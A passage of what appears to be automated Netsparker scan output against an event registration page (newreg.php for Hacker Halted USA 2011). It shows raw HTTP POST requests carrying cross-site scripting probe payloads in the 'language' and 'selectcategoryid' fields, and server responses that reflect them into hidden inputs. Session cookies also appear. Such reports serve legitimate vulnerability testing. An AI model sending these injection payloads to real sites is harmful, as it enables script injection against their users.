style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
admin POST -1
bridgeid POST 3
categoryid POST -1
catpassword[65407] POST 3
catpassword[65411] POST 3
catpassword[65413] POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65421] POST 3
discountcode POST 3
eb POST 3
eventid POST 19301
language POST '" ns= alert(0x00023C)
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=cc6478a5fe634e0898fb30aa29d3ebea
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=scamggbr37vkhil8ks9b9rsn65
Content-Length: 1593
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="action"

preload_category
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="admin"

-1
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="bridgeid"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="categoryid"

-1
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="catpassword[65407]"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="catpassword[65411]"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="catpassword[65413]"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="catpassword[65419]"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="catpassword[65420]"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="catpassword[65421]"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="discountcode"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="eb"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="eventid"

19301
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="language"

'" ns= netsparker(0x00023C)
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="reference"

3
--cc6478a5fe634e0898fb30aa29d3ebea
Content-Disposition: form-data; name="selectcategoryid"

65410
--cc6478a5fe634e0898fb30aa29d3ebea--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:05:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 2937
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" ><a class="menu" href="/ereg/index.php?&" title="Welcome">Welcome</a></td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="\'\" ns= netsparker(0x00023C) " /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" >ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td> </td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
admin POST -1
apply_code POST Apply Code
bridgeid POST 3
categoryid POST 65410
discountcode POST 3
eb POST 3
eventid POST 19301
input[email] POST netsparker@example.com
language POST '" ns= alert(0x0002BC)
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=283d1198d6464bf6a1725cc289db3009
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=9bt6bfisih7r4b9n63f30vhkh6
Content-Length: 1202
Accept-Encoding: gzip, deflate

--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="action"

submit
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="admin"

-1
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="apply_code"

Apply Code
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="bridgeid"

3
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="categoryid"

65410
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="discountcode"

3
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="eb"

3
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="eventid"

19301
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="language"

'" ns= netsparker(0x0002BC)
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="reference"

3
--283d1198d6464bf6a1725cc289db3009
Content-Disposition: form-data; name="selectcategoryid"

65410
--283d1198d6464bf6a1725cc289db3009--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:06:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=3rf79ju947mcq7pjetshovorf0; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3007
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="\'\" ns= netsparker(0x0002BC) " /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1 [feemessage] => )--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td> </td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
admin POST -1
apply_code POST Apply Code
bridgeid POST 3
categoryid POST 65410
discountcode POST 3
eb POST 3
eventid POST 19301
input[email] POST netsparker@example.com
language POST eng
reference POST 3
selectcategoryid POST '" ns= alert(0x00063A)

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=46117db0ebc54f178cee3d0d38f880fc
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=lbl3t0c34lkomnqtto4hlcgc24
Content-Length: 1200
Accept-Encoding: gzip, deflate

--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="action"

submit
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="admin"

-1
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="apply_code"

Apply Code
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="bridgeid"

3
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="categoryid"

65410
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="discountcode"

3
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="eb"

3
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="eventid"

19301
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="language"

eng
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="reference"

3
--46117db0ebc54f178cee3d0d38f880fc
Content-Disposition: form-data; name="selectcategoryid"

'" ns= netsparker(0x00063A)
--46117db0ebc54f178cee3d0d38f880fc--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:21:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=vol4hm8iseaqpr9v5jtrrea775; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 2755
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="\'\" ns= netsparker(0x00063A) " /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [fee] => 1 [feemessage] => )--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><input type="hidden" name="selectcategoryid" value="-1" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST '" ns= alert(0x0007F2)
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410 -----------------------------7db109117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
